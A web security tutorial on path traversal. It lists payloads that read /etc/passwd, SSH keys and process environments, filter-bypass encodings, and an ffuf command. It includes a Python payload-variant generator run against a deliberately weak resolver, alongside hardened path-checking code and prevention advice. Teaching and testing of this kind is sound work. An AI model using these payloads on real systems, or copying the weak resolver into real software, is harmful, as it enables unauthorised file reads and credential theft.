Path Traversal: Escaping the Web Root
Understanding and exploiting directory traversal vulnerabilities
What is Path Traversal?
Path Traversal (also called Directory Traversal) is a web security vulnerability that lets an attacker read, and sometimes write, files outside the directory the application intended to expose, by supplying file paths containing “../” sequences and related constructs that the application passes to the filesystem without proper canonicalization and validation.
Normal File Access
Legitimate request for an image:
GET /images/profile.jpg HTTP/1.1
Path Traversal Attack
Malicious request to access sensitive files:
GET /images/../../../../etc/passwd HTTP/1.1
Note that most web servers normalize “..” in the request path itself before routing, so in practice the traversal sequence is usually supplied in a parameter (file=, img=, template=) that the application code joins onto a directory and opens, as in the scenarios below.
How Path Traversal Works
Web servers typically restrict users to a specific “web root” directory. If the application takes a user-controlled value, concatenates it onto a base directory and opens the result without canonicalizing and validating it, attackers can “climb up” the directory tree using dot-dot-slash (../) until they reach any file the server process is permitted to read.
Common Vulnerable Scenarios
1. File Download Functionality
https://example.com/download?file=../../../../etc/passwd
2. Image Loading
https://example.com/loadImage?img=../../../.ssh/id_rsa
3. Template Inclusion
https://example.com/render?template=../../../../proc/self/environ
Path Traversal Techniques
| Technique | Example | Purpose |
|---|---|---|
| Basic traversal | ../../etc/passwd | Standard path traversal |
| URL encoding | ..%2F..%2Fetc%2Fpasswd | Bypass filters that look for a literal “../” before decoding |
| Double encoding | ..%252F..%252Fetc%252Fpasswd | Survive one decoding layer (for example the web server) and be decoded again by the application |
| Null byte | ../../etc/passwd%00 | Terminate the string after the payload so an appended extension is ignored; only works on legacy runtimes (for example PHP before 5.3.4), modern ones reject NUL bytes |
| Absolute path | /etc/passwd | Direct file reference; works when the application joins paths with a function that discards the base directory on absolute input |
Testing for Path Traversal
1. Manual Testing
- Identify parameters that name files or paths (file, path, doc, template, img, page, etc.)
- Try basic traversal sequences, increasing the number of ../ steps since the depth of the base directory is unknown
- Experiment with different encodings and separators (%2F, %252F, backslash on Windows)
- Establish what a successful read looks like: request a file that must exist (/etc/passwd on Linux, C:\Windows\win.ini on Windows) and compare the response size and status against a file that cannot exist, so a blocked request is distinguishable from an error page
2. Common Files to Check
- /etc/passwd (world-readable; the standard proof of traversal on Linux)
- /etc/shadow (readable only if the web process runs as root)
- /proc/self/environ (environment of the process serving the request, which often contains credentials)
- /var/log/apache2/access.log (web server log; also a common target for log poisoning when traversal turns into file inclusion)
- C:\Windows\System32\drivers\etc\hosts (world-readable proof of traversal on Windows)
3. Automated Tools
Using Burp Suite:
1. Spider the application
2. Find file parameters
3. Use Intruder with traversal payloads, sorting results by response length and status code

Using ffuf:
ffuf -u "https://example.com/download?file=FUZZ" -w traversal.txt
Filter out the default error response (for example with -fc for status codes or -fs for response sizes) so that only genuine reads remain in the output.
Bypassing Defenses
1. Path Normalization Bypass
Filters that strip “../” once (non-recursively) or check only the raw value are defeated by nested and encoded forms:
- ....// (stripping one “../” leaves “../”)
- ....\/ and ..\/.. (mixed separators, useful on Windows or where backslash is converted)
- %2e%2e%2f (encoded dots and slash)
- .%2e/%2e%2e/%2f (partially encoded components)
2. Starting Directory Bypass
When restricted to a specific directory:
- /var/www/html/uploads/../../../etc/passwd (start with the expected absolute prefix, then traverse)
- uploads/../../../../etc/passwd (start with the expected relative directory, then traverse)
3. File Extension Bypass
When required extensions are enforced:
- ../../etc/passwd%00.jpg (null-byte truncation; legacy runtimes only)
- ../../etc/passwd?.jpg (only when the value is later used in a URL, where “?” starts the query string; send it as %3F so the outer request is not cut)
- ../../etc/passwd%23.jpg (same idea with “#”, which starts a fragment)
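The following is an added example, not code from the original page. It builds the payload variants from the techniques table above and runs them through a deliberately weak resolver of the kind the bypass section describes (strip “../” once on the encoded value, decode afterwards, join with a function that discards the base on absolute input), reporting which variants escape. The web root, the filter logic and the default target are assumptions for the simulation; nothing touches the real filesystem, and the variant list doubles as a traversal.txt for the ffuf step.

```python
"""Added example: traversal payload variants against a deliberately weak filter."""
from __future__ import annotations

import posixpath
from urllib.parse import quote, unquote

WEB_ROOT = "/var/www/html/uploads"   # assumed web root, four components deep


def traversal_variants(depth: int, target: str) -> dict[str, str]:
    """Payload variants for `target`, keyed by technique name.
    Printing the values one per line gives a wordlist for ffuf."""
    raw = "../" * depth + target.lstrip("/")
    encoded = quote(raw, safe="")               # '/' -> %2F, dots stay literal
    return {
        "basic": raw,
        "url_encoded": encoded,
        "double_encoded": quote(encoded, safe=""),   # '%' -> %25
        "nested": raw.replace("../", "....//"),      # stripping '../' once leaves '../'
        "null_byte": raw + "%00.jpg",                # legacy runtimes truncate at NUL
        "absolute": "/" + target.lstrip("/"),
    }


def naive_filter(user_path: str, decode_passes: int = 1) -> str:
    """Deliberately weak resolver (the bug under discussion, kept on purpose):
    1. strips '../' once, non-recursively, on the *encoded* value;
    2. URL-decodes afterwards (twice if a front-end decoded once already);
    3. joins with posixpath.join, which discards WEB_ROOT on absolute input."""
    cleaned = user_path.replace("../", "")
    for _ in range(decode_passes):
        cleaned = unquote(cleaned)
    return posixpath.normpath(posixpath.join(WEB_ROOT, cleaned))


def escapes_root(resolved: str) -> bool:
    """True when the resolved path lies outside WEB_ROOT."""
    return resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + "/")


def audit(depth: int = 4, target: str = "etc/passwd",
          decode_passes: int = 1) -> dict[str, bool]:
    """Map each technique name to whether it escapes the web root via naive_filter."""
    return {
        name: escapes_root(naive_filter(payload, decode_passes))
        for name, payload in traversal_variants(depth, target).items()
    }


if __name__ == "__main__":
    for name, escaped in audit().items():
        print(f"{name:15} {'ESCAPES' if escaped else 'contained'}")
    print("double_encoded with a second decode:", audit(decode_passes=2)["double_encoded"])
```

With one decoding pass the URL-encoded, nested and absolute variants escape while the basic, null-byte and double-encoded ones stay inside; the double-encoded variant only escapes once a second decode is applied, which is exactly the “multiple decoding layers” condition the table names.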
Real-World Examples
Case 1: Web Server Configuration
A CMS plugin allowed file downloads via a parameter vulnerable to traversal, exposing server credentials.
Case 2: Image Processing Service
An image resizing service didn’t validate input paths, allowing access to AWS credentials.
Case 3: Log Viewer Application
A web-based log viewer accepted arbitrary paths, exposing sensitive system files.
Prevention and Mitigation
1. Input Validation
- Prefer an allowlist of expected values (for example file names matching a strict pattern of alphanumerics, dash, underscore and one known extension) over a denylist of bad sequences
- Rejecting a literal “../” is not enough on its own: encoded, double-encoded and nested forms slip past it, so decode and canonicalize first and validate the canonical result
2. Secure File Operations
- Use index-based file access (an ID or key maps to a server-side file name) instead of accepting paths from the client
- Join the request onto a fixed base directory, canonicalize the result (resolving “..” and symlinks), and check that it is still inside the base; compare whole path components rather than a string prefix, or a sibling such as /srv/files_private will pass a check for /srv/files
- Reject absolute paths and NUL bytes before joining, since common join functions discard the base directory on absolute input
- Run the file-serving process with least privilege and, for sensitive operations, inside a chroot jail or container so that even a successful traversal reaches little
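The following is an added example, not code from the original page. It implements the base-directory check from the list above in Python (canonicalize with realpath, then compare path components with commonpath), shows the string-prefix variant it replaces accepting a sibling directory, and adds an ID-to-file lookup for index-based access. The directory layout, the ID map and the function names are constructed for the demonstration; the fixture is built in a temporary directory so the checks can be exercised offline.

```python
"""Added example: hardened path resolution beside the prefix check it replaces."""
from __future__ import annotations

import os
import tempfile

# Constructed ID -> file name map standing in for a database column.
FILE_INDEX = {"report": "report.pdf"}


def safe_resolve(base_dir: str, user_path: str) -> str:
    """Return the absolute path of user_path inside base_dir, or raise ValueError.

    - NUL bytes and absolute input are rejected up front; os.path.join would
      silently discard base_dir for an absolute second argument.
    - realpath() canonicalises '..' and symlinks, so validation sees the target.
    - commonpath() compares whole components, so a sibling such as
      base_dir + '_private' is not mistaken for a child of base_dir."""
    if "\x00" in user_path or os.path.isabs(user_path):
        raise ValueError("absolute path or NUL byte rejected")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def prefix_check(base_dir: str, user_path: str) -> bool:
    """The common but flawed check: normalise, then str.startswith().
    Accepts <root>/files_private/x as 'inside' <root>/files."""
    base = os.path.realpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, user_path))
    return candidate.startswith(base)


def is_rejected(base_dir: str, user_path: str) -> bool:
    """True when safe_resolve refuses the request."""
    try:
        safe_resolve(base_dir, user_path)
    except ValueError:
        return True
    return False


def lookup_by_id(base_dir: str, file_id: str) -> str:
    """Index-based access: the client sends an ID, the server owns the file name."""
    if file_id not in FILE_INDEX:
        raise KeyError(f"unknown file id {file_id!r}")
    return safe_resolve(base_dir, FILE_INDEX[file_id])


def build_fixture() -> str:
    """Constructed layout (an assumption for the demo), returns the served dir:
       <tmp>/files/report.pdf              served directory
       <tmp>/files/link -> <tmp>/outside.txt   symlink escaping the directory
       <tmp>/files_private/secret.txt      sibling a prefix check would accept
       <tmp>/outside.txt"""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "files")
    os.mkdir(base)
    os.mkdir(os.path.join(root, "files_private"))
    for rel in ("files/report.pdf", "files_private/secret.txt", "outside.txt"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(rel)
    os.symlink(os.path.join(root, "outside.txt"), os.path.join(base, "link"))
    return base


if __name__ == "__main__":
    served = build_fixture()
    for req in ("report.pdf", "../outside.txt", "/etc/passwd", "link",
                "../files_private/secret.txt", "report.pdf\x00.txt"):
        print(f"{req!r:32} rejected={is_rejected(served, req)} "
              f"prefix_check={prefix_check(served, req)}")
    print("by id:", lookup_by_id(served, "report"))
```

The symlink case is why the check runs on realpath() rather than normpath(): a lexical check sees “link” as a child of the served directory, while the resolved target is outside it. The same ordering (canonicalize, then validate) is what the input-validation list above asks for.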
Conclusion
Path Traversal remains a critical vulnerability because it is often easy to exploit and the impact ranges from information disclosure (configuration files, credentials, source code) to full system compromise when the read primitive reaches keys or tokens, or when the same flaw allows a file to be written or included.